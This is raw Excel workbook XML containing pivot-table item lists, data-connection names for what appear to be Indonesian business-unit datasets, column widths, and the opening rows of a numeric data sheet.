        <item x="1265"/>
        <item x="1124"/>
        <item x="1111"/>
        <item x="1175"/>
        <item x="594"/>
        <item x="1348"/>
        <item x="1256"/>
        <item x="24"/>
        <item x="1516"/>
        <item x="1314"/>
        <item x="1207"/>
        <item x="57"/>
        <item x="1189"/>
        <item x="1258"/>
        <item x="164"/>
        <item x="274"/>
        <item x="387"/>
        <item x="65"/>
        <item x="1369"/>
        <item x="1047"/>
        <item x="502"/>
        <item x="178"/>
        <item x="1322"/>
        <item x="1419"/>
        <item x="1446"/>
        <item x="1376"/>
        <item x="1410"/>
        <item x="1302"/>
        <item x="1126"/>
        <item x="1205"/>
        <item x="302"/>
        <item x="724"/>
        <item x="298"/>
        <item x="1298"/>
        <item x="390"/>
        <item x="1336"/>
        <item x="1335"/>
        <item x="1264"/>
        <item x="1245"/>
        <item x="1476"/>
        <item x="1431"/>
        <item x="1429"/>
        <item x="1354"/>
        <item x="1179"/>
        <item x="1437"/>
        <item x="1436"/>
        <item x="573"/>
        <item x="1363"/>
        <item x="1423"/>
        <item x="1273"/>
        <item x="1371"/>
        <item x="1370"/>
        <item x="1004"/>
        <item x="1421"/>
        <item x="537"/>
        <item x="208"/>
        <item x="643"/>
        <item x="782"/>
        <item x="1491"/>
        <item x="88"/>
        <item x="1438"/>
        <item x="1079"/>
        <item x="836"/>
        <item x="1262"/>
        <item x="1278"/>
        <item x="1285"/>
        <item x="1384"/>
        <item x="1344"/>
        <item x="159"/>
        <item x="1444"/>
        <item x="1489"/>
        <item x="1330"/>
        <item x="1339"/>
        <item x="426"/>
        <item x="824"/>
        <item x="183"/>
        <item x="1457"/>
        <item x="1343"/>
        <item x="778"/>
        <item x="1595"/>
        <item x="1432"/>
        <item x="1501"/>
        <item x="1404"/>
        <item x="1418"/>
        <item x="367"/>
        <item x="1474"/>
        <item x="1450"/>
        <item x="427"/>
        <item x="1334"/>
        <item x="1228"/>
        <item x="1387"/>
        <item x="1142"/>
        <item x="1109"/>
        <item x="541"/>
        <item x="623"/>
        <item x="1208"/>
        <item x="1240"/>
        <item x="1059"/>
        <item x="268"/>
        <item x="696"/>
        <item x="1007"/>
        <item x="679"/>
        <item x="48"/>
        <item x="342"/>
        <item x="1584"/>
        <item x="1551"/>
        <item x="969"/>
        <item x="1236"/>
        <item x="1575"/>
        <item x="76"/>
        <item x="62"/>
        <item x="790"/>
        <item x="343"/>
        <item x="845"/>
        <item x="1310"/>
        <item x="196"/>
        <item x="697"/>
        <item x="20"/>
        <item x="205"/>
        <item x="1590"/>
        <item x="419"/>
        <item x="788"/>
        <item x="646"/>
        <item x="668"/>
        <item x="1321"/>
        <item x="220"/>
        <item x="277"/>
        <item x="63"/>
        <item x="149"/>
        <item x="137"/>
        <item x="79"/>
        <item x="1526"/>
        <item x="37"/>
        <item x="399"/>
        <item x="521"/>
        <item x="453"/>
        <item x="330"/>
        <item x="740"/>
        <item x="975"/>
        <item x="299"/>
        <item x="1237"/>
        <item x="1140"/>
        <item x="469"/>
        <item x="276"/>
        <item x="417"/>
        <item x="949"/>
        <item x="358"/>
        <item x="19"/>
        <item x="284"/>
        <item x="1531"/>
        <item x="142"/>
        <item x="1547"/>
        <item x="1227"/>
        <item x="31"/>
        <item x="910"/>
        <item x="1282"/>
        <item x="224"/>
        <item x="235"/>
        <item x="93"/>
        <item x="10"/>
        <item x="128"/>
        <item x="12"/>
        <item x="1351"/>
        <item x="106"/>
        <item x="188"/>
        <item x="499"/>
        <item x="590"/>
        <item x="231"/>
        <item x="95"/>
        <item x="1486"/>
        <item x="1022"/>
        <item x="1186"/>
        <item x="346"/>
        <item x="61"/>
        <item x="868"/>
        <item x="752"/>
        <item x="982"/>
        <item x="859"/>
        <item x="1349"/>
        <item x="425"/>
        <item x="396"/>
        <item x="101"/>
        <item x="316"/>
        <item x="104"/>
        <item x="670"/>
        <item x="85"/>
        <item x="553"/>
        <item x="58"/>
        <item x="206"/>
        <item x="225"/>
        <item x="379"/>
        <item x="223"/>
        <item x="385"/>
        <item x="215"/>
        <item x="64"/>
        <item x="59"/>
        <item x="826"/>
        <item x="460"/>
        <item x="753"/>
        <item x="377"/>
        <item x="366"/>
        <item x="2"/>
        <item x="47"/>
        <item x="148"/>
        <item x="242"/>
        <item x="16"/>
        <item x="161"/>
        <item x="144"/>
        <item x="77"/>
        <item x="667"/>
        <item x="114"/>
        <item x="828"/>
        <item x="199"/>
        <item x="255"/>
        <item x="146"/>
        <item x="248"/>
        <item x="1105"/>
        <item x="354"/>
        <item x="252"/>
        <item x="39"/>
        <item x="181"/>
        <item x="1544"/>
        <item x="22"/>
        <item x="152"/>
        <item x="420"/>
        <item x="1563"/>
        <item x="481"/>
        <item x="136"/>
        <item x="829"/>
        <item x="147"/>
        <item x="0"/>
        <item x="53"/>
        <item x="46"/>
        <item x="395"/>
        <item x="118"/>
        <item x="1395"/>
        <item x="66"/>
        <item x="8"/>
        <item x="195"/>
        <item x="38"/>
        <item x="69"/>
        <item x="52"/>
        <item x="497"/>
        <item x="461"/>
        <item x="733"/>
        <item x="197"/>
        <item x="459"/>
        <item x="190"/>
        <item x="28"/>
        <item x="87"/>
        <item x="70"/>
        <item x="68"/>
        <item x="120"/>
        <item x="629"/>
        <item x="83"/>
        <item x="559"/>
        <item x="78"/>
        <item x="96"/>
        <item x="67"/>
        <item x="168"/>
        <item x="310"/>
        <item x="123"/>
        <item x="184"/>
        <item x="303"/>
        <item x="115"/>
        <item x="89"/>
        <item x="99"/>
        <item x="97"/>
        <item x="172"/>
        <item x="92"/>
        <item x="94"/>
        <item x="108"/>
        <item x="130"/>
        <item x="138"/>
        <item x="207"/>
        <item x="170"/>
        <item x="167"/>
        <item x="126"/>
        <item x="189"/>
        <item x="180"/>
        <item x="127"/>
        <item x="162"/>
        <item x="250"/>
        <item x="160"/>
        <item x="133"/>
        <item x="131"/>
        <item x="994"/>
        <item x="328"/>
        <item x="179"/>
        <item x="322"/>
        <item x="166"/>
        <item x="837"/>
        <item x="218"/>
        <item x="151"/>
        <item x="109"/>
        <item x="182"/>
        <item x="445"/>
        <item x="818"/>
        <item x="186"/>
        <item x="141"/>
        <item x="247"/>
        <item x="163"/>
        <item x="232"/>
        <item x="282"/>
        <item x="244"/>
        <item x="173"/>
        <item x="309"/>
        <item x="271"/>
        <item x="229"/>
        <item x="335"/>
        <item x="249"/>
        <item x="370"/>
        <item x="202"/>
        <item x="203"/>
        <item x="266"/>
        <item x="204"/>
        <item x="228"/>
        <item x="458"/>
        <item x="1305"/>
        <item x="574"/>
        <item x="214"/>
        <item x="339"/>
        <item x="210"/>
        <item x="264"/>
        <item x="226"/>
        <item x="267"/>
        <item x="217"/>
        <item x="327"/>
        <item x="280"/>
        <item x="275"/>
        <item x="404"/>
        <item x="304"/>
        <item x="293"/>
        <item x="382"/>
        <item x="291"/>
        <item x="245"/>
        <item x="260"/>
        <item x="307"/>
        <item x="259"/>
        <item x="727"/>
        <item x="269"/>
        <item x="263"/>
        <item x="433"/>
        <item x="286"/>
        <item x="301"/>
        <item x="383"/>
        <item x="494"/>
        <item x="321"/>
        <item x="633"/>
        <item x="380"/>
        <item x="348"/>
        <item x="398"/>
        <item x="589"/>
        <item x="397"/>
        <item x="447"/>
        <item x="333"/>
        <item x="294"/>
        <item x="648"/>
        <item x="465"/>
        <item x="758"/>
        <item x="290"/>
        <item x="314"/>
        <item x="318"/>
        <item x="319"/>
        <item x="401"/>
        <item x="400"/>
        <item x="325"/>
        <item x="352"/>
        <item x="535"/>
        <item x="434"/>
        <item x="1176"/>
        <item x="344"/>
        <item x="360"/>
        <item x="565"/>
        <item x="340"/>
        <item x="607"/>
        <item x="669"/>
        <item x="638"/>
        <item x="890"/>
        <item x="389"/>
        <item x="372"/>
        <item x="361"/>
        <item x="478"/>
        <item x="429"/>
        <item x="375"/>
        <item x="378"/>
        <item x="406"/>
        <item x="405"/>
        <item x="748"/>
        <item x="407"/>
        <item x="394"/>
        <item x="1133"/>
        <item x="391"/>
        <item x="437"/>
        <item x="393"/>
        <item x="609"/>
        <item x="616"/>
        <item x="416"/>
        <item x="928"/>
        <item x="413"/>
        <item x="477"/>
        <item x="878"/>
        <item x="438"/>
        <item x="587"/>
        <item x="881"/>
        <item x="446"/>
        <item x="444"/>
        <item x="504"/>
        <item x="451"/>
        <item x="958"/>
        <item x="644"/>
        <item x="493"/>
        <item x="570"/>
        <item x="544"/>
        <item x="971"/>
        <item x="508"/>
        <item x="630"/>
        <item x="581"/>
        <item x="545"/>
        <item x="513"/>
        <item x="486"/>
        <item x="546"/>
        <item x="496"/>
        <item x="688"/>
        <item x="1328"/>
        <item x="540"/>
        <item x="848"/>
        <item x="920"/>
        <item x="526"/>
        <item x="612"/>
        <item x="532"/>
        <item x="516"/>
        <item x="626"/>
        <item x="582"/>
        <item x="554"/>
        <item x="551"/>
        <item x="657"/>
        <item x="556"/>
        <item x="550"/>
        <item x="558"/>
        <item x="761"/>
        <item x="578"/>
        <item x="692"/>
        <item x="566"/>
        <item x="747"/>
        <item x="732"/>
        <item x="689"/>
        <item x="561"/>
        <item x="568"/>
        <item x="606"/>
        <item x="676"/>
        <item x="933"/>
        <item x="764"/>
        <item x="571"/>
        <item x="650"/>
        <item x="675"/>
        <item x="597"/>
        <item x="907"/>
        <item x="714"/>
        <item x="1213"/>
        <item x="785"/>
        <item x="639"/>
        <item x="632"/>
        <item x="631"/>
        <item x="613"/>
        <item x="591"/>
        <item x="1517"/>
        <item x="640"/>
        <item x="1230"/>
        <item x="685"/>
        <item x="622"/>
        <item x="595"/>
        <item x="693"/>
        <item x="844"/>
        <item x="1405"/>
        <item x="677"/>
        <item x="704"/>
        <item x="766"/>
        <item x="649"/>
        <item x="617"/>
        <item x="611"/>
        <item x="605"/>
        <item x="604"/>
        <item x="665"/>
        <item x="651"/>
        <item x="683"/>
        <item x="619"/>
        <item x="660"/>
        <item x="781"/>
        <item x="800"/>
        <item x="682"/>
        <item x="673"/>
        <item x="708"/>
        <item x="750"/>
        <item x="698"/>
        <item x="681"/>
        <item x="700"/>
        <item x="751"/>
        <item x="792"/>
        <item x="1505"/>
        <item x="817"/>
        <item x="690"/>
        <item x="706"/>
        <item x="705"/>
        <item x="680"/>
        <item x="1530"/>
        <item x="731"/>
        <item x="1581"/>
        <item x="728"/>
        <item x="720"/>
        <item x="687"/>
        <item x="699"/>
        <item x="830"/>
        <item x="712"/>
        <item x="716"/>
        <item x="718"/>
        <item x="746"/>
        <item x="813"/>
        <item x="814"/>
        <item x="725"/>
        <item x="711"/>
        <item x="875"/>
        <item x="898"/>
        <item x="744"/>
        <item x="749"/>
        <item x="736"/>
        <item x="737"/>
        <item x="804"/>
        <item x="775"/>
        <item x="745"/>
        <item x="851"/>
        <item x="882"/>
        <item x="821"/>
        <item x="768"/>
        <item x="759"/>
        <item x="985"/>
        <item x="902"/>
        <item x="791"/>
        <item x="769"/>
        <item x="805"/>
        <item x="786"/>
        <item x="799"/>
        <item x="806"/>
        <item x="825"/>
        <item x="887"/>
        <item x="835"/>
        <item x="827"/>
        <item x="867"/>
        <item x="901"/>
        <item x="922"/>
        <item x="915"/>
        <item x="854"/>
        <item x="1279"/>
        <item x="831"/>
        <item x="840"/>
        <item x="833"/>
        <item x="900"/>
        <item x="1484"/>
        <item x="1088"/>
        <item x="955"/>
        <item x="856"/>
        <item x="852"/>
        <item x="873"/>
        <item x="1006"/>
        <item x="1546"/>
        <item x="874"/>
        <item x="1500"/>
        <item x="956"/>
        <item x="871"/>
        <item x="895"/>
        <item x="885"/>
        <item x="1008"/>
        <item x="937"/>
        <item x="883"/>
        <item x="880"/>
        <item x="897"/>
        <item x="886"/>
        <item x="903"/>
        <item x="906"/>
        <item x="932"/>
        <item x="899"/>
        <item x="918"/>
        <item x="892"/>
        <item x="891"/>
        <item x="926"/>
        <item x="911"/>
        <item x="919"/>
        <item x="893"/>
        <item x="1252"/>
        <item x="961"/>
        <item x="896"/>
        <item x="1003"/>
        <item x="931"/>
        <item x="905"/>
        <item x="1518"/>
        <item x="908"/>
        <item x="938"/>
        <item x="929"/>
        <item x="934"/>
        <item x="947"/>
        <item x="935"/>
        <item x="939"/>
        <item x="954"/>
        <item x="984"/>
        <item x="924"/>
        <item x="1573"/>
        <item x="941"/>
        <item x="1113"/>
        <item x="930"/>
        <item x="952"/>
        <item x="940"/>
        <item x="1507"/>
        <item x="944"/>
        <item x="1015"/>
        <item x="1019"/>
        <item x="943"/>
        <item x="997"/>
        <item x="963"/>
        <item x="978"/>
        <item x="1116"/>
        <item x="951"/>
        <item x="1210"/>
        <item x="1122"/>
        <item x="1009"/>
        <item x="990"/>
        <item x="964"/>
        <item x="989"/>
        <item x="1139"/>
        <item x="980"/>
        <item x="1001"/>
        <item x="991"/>
        <item x="979"/>
        <item x="1353"/>
        <item x="1529"/>
        <item x="1066"/>
        <item x="1039"/>
        <item x="1263"/>
        <item x="1018"/>
        <item x="1000"/>
        <item x="1028"/>
        <item x="1051"/>
        <item x="999"/>
        <item x="1383"/>
        <item x="1144"/>
        <item x="1010"/>
        <item x="1367"/>
        <item x="1014"/>
        <item x="1023"/>
        <item x="1548"/>
        <item x="1068"/>
        <item x="1174"/>
        <item x="1060"/>
        <item x="1054"/>
        <item x="1035"/>
        <item x="1036"/>
        <item x="1052"/>
        <item x="1049"/>
        <item x="1114"/>
        <item x="1100"/>
        <item x="1044"/>
        <item x="1091"/>
        <item x="1148"/>
        <item x="1075"/>
        <item x="1055"/>
        <item x="1065"/>
        <item x="1071"/>
        <item x="1081"/>
        <item x="1058"/>
        <item x="1062"/>
        <item x="1203"/>
        <item x="1112"/>
        <item x="1077"/>
        <item x="1069"/>
        <item x="1061"/>
        <item x="1099"/>
        <item x="1096"/>
        <item x="1097"/>
        <item x="1098"/>
        <item x="1106"/>
        <item x="1238"/>
        <item x="1072"/>
        <item x="1127"/>
        <item x="1089"/>
        <item x="1137"/>
        <item x="1095"/>
        <item x="1229"/>
        <item x="1084"/>
        <item x="1308"/>
        <item x="1092"/>
        <item x="1143"/>
        <item x="1180"/>
        <item x="1103"/>
        <item x="1094"/>
        <item x="1145"/>
        <item x="1317"/>
        <item x="1138"/>
        <item x="1119"/>
        <item x="1117"/>
        <item x="1123"/>
        <item x="1125"/>
        <item x="1120"/>
        <item x="1152"/>
        <item x="1234"/>
        <item x="1422"/>
        <item x="1287"/>
        <item x="1149"/>
        <item x="1187"/>
        <item x="1141"/>
        <item x="1153"/>
        <item x="1225"/>
        <item x="1389"/>
        <item x="1560"/>
        <item x="1170"/>
        <item x="1167"/>
        <item x="1185"/>
        <item x="1202"/>
        <item x="1163"/>
        <item x="1173"/>
        <item x="1164"/>
        <item x="1171"/>
        <item x="1220"/>
        <item x="1168"/>
        <item x="1329"/>
        <item x="1459"/>
        <item x="1183"/>
        <item x="1212"/>
        <item x="1190"/>
        <item x="1251"/>
        <item x="1270"/>
        <item x="1188"/>
        <item x="1261"/>
        <item x="1434"/>
        <item x="1415"/>
        <item x="1194"/>
        <item x="1195"/>
        <item x="1479"/>
        <item x="1320"/>
        <item x="1259"/>
        <item x="1215"/>
        <item x="1296"/>
        <item x="1283"/>
        <item x="1267"/>
        <item x="1231"/>
        <item x="1478"/>
        <item x="1224"/>
        <item x="1218"/>
        <item x="1219"/>
        <item x="1217"/>
        <item x="1222"/>
        <item x="1226"/>
        <item x="1269"/>
        <item x="1379"/>
        <item x="1341"/>
        <item x="1403"/>
        <item x="1250"/>
        <item x="1253"/>
        <item x="1255"/>
        <item x="1407"/>
        <item x="1257"/>
        <item x="1249"/>
        <item x="1463"/>
        <item x="1350"/>
        <item x="1274"/>
        <item x="1266"/>
        <item x="1462"/>
        <item x="1276"/>
        <item x="1514"/>
        <item x="1268"/>
        <item x="1280"/>
        <item x="1289"/>
        <item x="1325"/>
        <item x="1272"/>
        <item x="1388"/>
        <item x="1374"/>
        <item x="1292"/>
        <item x="1297"/>
        <item x="1402"/>
        <item x="1303"/>
        <item x="1288"/>
        <item x="1326"/>
        <item x="1286"/>
        <item x="1290"/>
        <item x="1291"/>
        <item x="1316"/>
        <item x="1381"/>
        <item x="1327"/>
        <item x="1483"/>
        <item x="1358"/>
        <item x="1311"/>
        <item x="1312"/>
        <item x="1313"/>
        <item x="1319"/>
        <item x="1428"/>
        <item x="1417"/>
        <item x="1315"/>
        <item x="1596"/>
        <item x="1357"/>
        <item x="1372"/>
        <item x="1356"/>
        <item x="1467"/>
        <item x="1562"/>
        <item x="1347"/>
        <item x="1366"/>
        <item x="1386"/>
        <item x="1340"/>
        <item x="1364"/>
        <item x="1365"/>
        <item x="1346"/>
        <item x="1338"/>
        <item x="1440"/>
        <item x="1352"/>
        <item x="1416"/>
        <item x="1355"/>
        <item x="1394"/>
        <item x="1375"/>
        <item x="1445"/>
        <item x="1362"/>
        <item x="1385"/>
        <item x="1361"/>
        <item x="1382"/>
        <item x="1549"/>
        <item x="1373"/>
        <item x="1398"/>
        <item x="1368"/>
        <item x="1497"/>
        <item x="1378"/>
        <item x="1380"/>
        <item x="1427"/>
        <item x="1401"/>
        <item x="1397"/>
        <item x="1396"/>
        <item x="1392"/>
        <item x="1393"/>
        <item x="1409"/>
        <item x="1426"/>
        <item x="1408"/>
        <item x="1442"/>
        <item x="1411"/>
        <item x="1443"/>
        <item x="1413"/>
        <item x="1412"/>
        <item x="1510"/>
        <item x="1414"/>
        <item x="1441"/>
        <item x="1525"/>
        <item x="1430"/>
        <item x="1420"/>
        <item x="1435"/>
        <item x="1439"/>
        <item x="1449"/>
        <item x="1512"/>
        <item x="1451"/>
        <item x="1452"/>
        <item x="1534"/>
        <item x="1520"/>
        <item x="1495"/>
        <item x="1448"/>
        <item x="1480"/>
        <item x="1535"/>
        <item x="1503"/>
        <item x="1506"/>
        <item x="1527"/>
        <item x="1471"/>
        <item x="1472"/>
        <item x="1577"/>
        <item x="1492"/>
        <item x="1521"/>
        <item x="1464"/>
        <item x="1557"/>
        <item x="1468"/>
        <item x="1481"/>
        <item x="1469"/>
        <item x="1466"/>
        <item x="1540"/>
        <item x="1496"/>
        <item x="1564"/>
        <item x="1537"/>
        <item x="1470"/>
        <item x="1572"/>
        <item x="1511"/>
        <item x="1522"/>
        <item x="1485"/>
        <item x="1477"/>
        <item x="1473"/>
        <item x="1475"/>
        <item x="1567"/>
        <item x="1482"/>
        <item x="1558"/>
        <item x="1528"/>
        <item x="1487"/>
        <item x="1488"/>
        <item x="1493"/>
        <item x="1513"/>
        <item x="1550"/>
        <item x="1499"/>
        <item x="1504"/>
        <item x="1509"/>
        <item x="1515"/>
        <item x="1554"/>
        <item x="1524"/>
        <item x="1536"/>
        <item x="1561"/>
        <item x="1533"/>
        <item x="1568"/>
        <item x="1541"/>
        <item x="1542"/>
        <item x="1589"/>
        <item x="1545"/>
        <item x="1539"/>
        <item x="1556"/>
        <item x="1580"/>
        <item x="1555"/>
        <item x="1571"/>
        <item x="1576"/>
        <item x="1579"/>
        <item x="1565"/>
        <item x="1559"/>
        <item x="1569"/>
        <item x="1587"/>
        <item x="1570"/>
        <item x="1566"/>
        <item x="1583"/>
        <item x="1582"/>
        <item x="1588"/>
        <item x="1591"/>
        <item x="1592"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="3"/>
  </rowFields>
  <rowItems count="15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t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="0"/>
  </colFields>
  <colItems count="7">
    <i>
      <x/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i>
      <x v="4"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </colItems>
  <dataFields count="1">
    <dataField name="Sum of uni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upi_plus_sarpras" connectionId="1" xr16:uid="{8B40912E-C85F-AB4A-88FD-AA862F77B53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upi_realisasi-pasar" connectionId="2" xr16:uid="{58C2FB15-6FAC-774B-AA70-AED366D19D3B}"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upi-nib-npwp" connectionId="3" xr16:uid="{76C1BDAE-9A5D-E841-97FF-7BF08FE670AE}"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upi-tenagakerja" connectionId="4" xr16:uid="{80E5B853-C81F-114F-9646-551F9F11F09E}"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C40E1-EFCB-EC4F-8FD5-93B5B7E9EF05}">
  <dimension ref="A1:BD1270"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="B7" sqref="B7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="6.1640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="59.5" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="25" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="80.6640625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="34.5" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="80.6640625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="8.83203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="6.1640625" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="19.83203125" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="10.1640625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="11.33203125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="8.1640625" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="9.1640625" bestFit="1" customWidth="1"/>
    <col min="14" max="15" width="10.1640625" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="11.5" bestFit="1" customWidth="1"/>
    <col min="17" max="17" width="11.33203125" bestFit="1" customWidth="1"/>
    <col min="18" max="18" width="15.5" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="10" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="11.33203125" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="10.5" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="11.6640625" bestFit="1" customWidth="1"/>
    <col min="23" max="24" width="10.1640625" bestFit="1" customWidth="1"/>
    <col min="25" max="26" width="10.5" bestFit="1" customWidth="1"/>
    <col min="27" max="27" width="11.83203125" bestFit="1" customWidth="1"/>
    <col min="28" max="28" width="11.6640625" bestFit="1" customWidth="1"/>
    <col min="29" max="29" width="15.83203125" bestFit="1" customWidth="1"/>
    <col min="30" max="30" width="10.33203125" bestFit="1" customWidth="1"/>
    <col min="31" max="31" width="11.6640625" bestFit="1" customWidth="1"/>
    <col min="32" max="32" width="49.33203125" bestFit="1" customWidth="1"/>
    <col min="33" max="33" width="11.33203125" bestFit="1" customWidth="1"/>
    <col min="34" max="34" width="11" bestFit="1" customWidth="1"/>
    <col min="35" max="35" width="13.1640625" bestFit="1" customWidth="1"/>
    <col min="36" max="36" width="10" bestFit="1" customWidth="1"/>
    <col min="37" max="37" width="19.83203125" bestFit="1" customWidth="1"/>
    <col min="38" max="38" width="24.5" bestFit="1" customWidth="1"/>
    <col min="39" max="39" width="40.1640625" bestFit="1" customWidth="1"/>
    <col min="40" max="40" width="20.6640625" bestFit="1" customWidth="1"/>
    <col min="41" max="41" width="14" bestFit="1" customWidth="1"/>
    <col min="42" max="42" width="67.33203125" bestFit="1" customWidth="1"/>
    <col min="43" max="43" width="80.6640625" bestFit="1" customWidth="1"/>
    <col min="44" max="44" width="35" bestFit="1" customWidth="1"/>
    <col min="45" max="45" width="39.83203125" bestFit="1" customWidth="1"/>
    <col min="46" max="46" width="9.83203125" bestFit="1" customWidth="1"/>
    <col min="53" max="53" width="33.1640625" customWidth="1"/>
    <col min="54" max="54" width="33.5" bestFit="1" customWidth="1"/>
    <col min="55" max="56" width="20" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5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s="10" t="s">
        <v>16223</v>
      </c>
      <c r="AV1" s="10" t="s">
        <v>16224</v>
      </c>
      <c r="AW1" s="10" t="s">
        <v>16229</v>
      </c>
      <c r="AX1" s="10" t="s">
        <v>16230</v>
      </c>
      <c r="AY1" s="10" t="s">
        <v>16228</v>
      </c>
      <c r="AZ1" s="10" t="s">
        <v>16231</v>
      </c>
      <c r="BA1" s="11" t="s">
        <v>14214</v>
      </c>
      <c r="BB1" s="11" t="s">
        <v>14203</v>
      </c>
      <c r="BC1" s="11" t="s">
        <v>16235</v>
      </c>
      <c r="BD1" s="11" t="s">
        <v>16236</v>
      </c>
    </row>
    <row r="2" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A2">
        <v>683</v>
      </c>
      <c r="B2" t="s">
        <v>46</v>
      </c>
      <c r="C2" t="s">
        <v>47</v>
      </c>
      <c r="D2" t="s">
        <v>48</v>
      </c>
      <c r="E2" t="s">
        <v>49</v>
      </c>
      <c r="F2" t="s">
        <v>50</v>
      </c>
      <c r="G2" s="1">
        <v>43942</v>
      </c>
      <c r="H2">
        <v>10</v>
      </c>
      <c r="I2">
        <v>10</v>
      </c>
      <c r="J2">
        <v>1</v>
      </c>
      <c r="K2">
        <v>0</v>
      </c>
      <c r="L2">
        <v>0</v>
      </c>
      <c r="M2">
        <v>0</v>
      </c>
      <c r="N2">
        <v>0</v>
      </c>
      <c r="O2">
        <v>0</v>
      </c>
      <c r="P2">
        <v>0</v>
      </c>
      <c r="Q2">
        <v>7</v>
      </c>
      <c r="R2">
        <v>7</v>
      </c>
      <c r="S2">
        <v>0</v>
      </c>
      <c r="T2">
        <v>1</v>
      </c>
      <c r="U2">
        <v>100</v>
      </c>
      <c r="V2">
        <v>0</v>
      </c>
      <c r="W2">
        <v>0</v>
      </c>
      <c r="X2">
        <v>0</v>
      </c>
      <c r="Y2">
        <v>0</v>
      </c>
      <c r="Z2">
        <v>0</v>
      </c>
      <c r="AA2">
        <v>0</v>
      </c>
      <c r="AB2">
        <v>5000</v>
      </c>
      <c r="AC2">
        <v>5000</v>
      </c>
      <c r="AD2">
        <v>0</v>
      </c>
      <c r="AE2">
        <v>2000</v>
      </c>
      <c r="AF2" t="s">
        <v>51</v>
      </c>
      <c r="AG2">
        <v>20373</v>
      </c>
      <c r="AH2">
        <v>2</v>
      </c>
      <c r="AJ2">
        <v>35</v>
      </c>
      <c r="AK2" t="s">
        <v>52</v>
      </c>
      <c r="AL2" t="s">
        <v>53</v>
      </c>
      <c r="AM2" t="s">
        <v>54</v>
      </c>
      <c r="AN2" t="s">
        <v>55</v>
      </c>
      <c r="AO2">
        <v>2017</v>
      </c>
      <c r="AP2">
        <v>82167620640</v>
      </c>
      <c r="AQ2" t="s">
        <v>56</v>
      </c>
      <c r="AR2" t="s">
        <v>51</v>
      </c>
      <c r="AS2" t="s">
        <v>57</v>
      </c>
      <c r="AT2" t="s">
        <v>58</v>
      </c>
      <c r="AU2">
        <v>30</v>
      </c>
      <c r="AV2">
        <v>2</v>
      </c>
      <c r="AW2">
        <v>10</v>
      </c>
      <c r="AX2">
        <v>3</v>
      </c>
      <c r="AY2">
        <v>12</v>
      </c>
      <c r="AZ2">
        <v>3</v>
      </c>
      <c r="BA2" t="s">
        <v>16735</v>
      </c>
      <c r="BB2" t="s">
        <v>14774</v>
      </c>
      <c r="BC2" t="s">
        <v>9952</v>
      </c>
      <c r="BD2" t="s">
        <v>10627</v>
      </c>
    </row>
    <row r="3" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>642</v>
      </c>
      <c r="B3" t="s">
        <v>59</v>
      </c>
      <c r="C3" t="s">
        <v>60</v>
      </c>
      <c r="D3" t="s">
        <v>61</v>
      </c>
      <c r="E3" t="s">
        <v>62</v>
      </c>
      <c r="F3" t="s">
        <v>63</v>
      </c>
      <c r="G3" s="1">
        <v>44245</v>
      </c>
      <c r="H3">
        <v>48</v>
      </c>
      <c r="I3">
        <v>48</v>
      </c>
      <c r="J3">
        <v>0</v>
      </c>
      <c r="K3">
        <v>2</v>
      </c>
      <c r="L3">
        <v>0</v>
      </c>
      <c r="M3">
        <v>1</v>
      </c>
      <c r="N3">
        <v>0</v>
      </c>
      <c r="O3">
        <v>0</v>
      </c>
      <c r="P3">
        <v>2</v>
      </c>
      <c r="Q3">
        <v>0</v>
      </c>
      <c r="R3">
        <v>4</v>
      </c>
      <c r="S3">
        <v>1</v>
      </c>
      <c r="T3">
        <v>1</v>
      </c>
      <c r="U3">
        <v>0</v>
      </c>
      <c r="V3">
        <v>2</v>
      </c>
      <c r="W3">
        <v>0</v>
      </c>
      <c r="X3">
        <v>1500</v>
      </c>
      <c r="Y3">
        <v>0</v>
      </c>
      <c r="Z3">
        <v>0</v>
      </c>
      <c r="AA3">
        <v>1000</v>
      </c>
      <c r="AB3">
        <v>0</v>
      </c>
      <c r="AC3">
        <v>2000</v>
      </c>
      <c r="AD3">
        <v>1</v>
      </c>
      <c r="AE3">
        <v>7000</v>
      </c>
      <c r="AF3" t="s">
        <v>64</v>
      </c>
      <c r="AG3">
        <v>35361</v>
      </c>
      <c r="AH3">
        <v>10</v>
      </c>
      <c r="AJ3">
        <v>128</v>
      </c>
      <c r="AK3" t="s">
        <v>65</v>
      </c>
      <c r="AL3" t="s">
        <v>66</v>
      </c>
      <c r="AM3" t="s">
        <v>67</v>
      </c>
      <c r="AN3" t="s">
        <v>68</v>
      </c>
      <c r="AO3">
        <v>2011</v>
      </c>
      <c r="AP3">
        <v>62721350375</v>
      </c>
      <c r="AQ3" t="s">
        <v>69</v>
      </c>
      <c r="AR3" t="s">
        <v>70</v>
      </c>
      <c r="AS3" t="s">
        <v>71</v>
      </c>
      <c r="AT3" t="s">
        <v>72</v>
      </c>
      <c r="AU3">
        <v>25</v>
      </c>
      <c r="AV3">
        <v>1</v>
      </c>
      <c r="AW3">
        <v>30</v>
      </c>
      <c r="AX3">
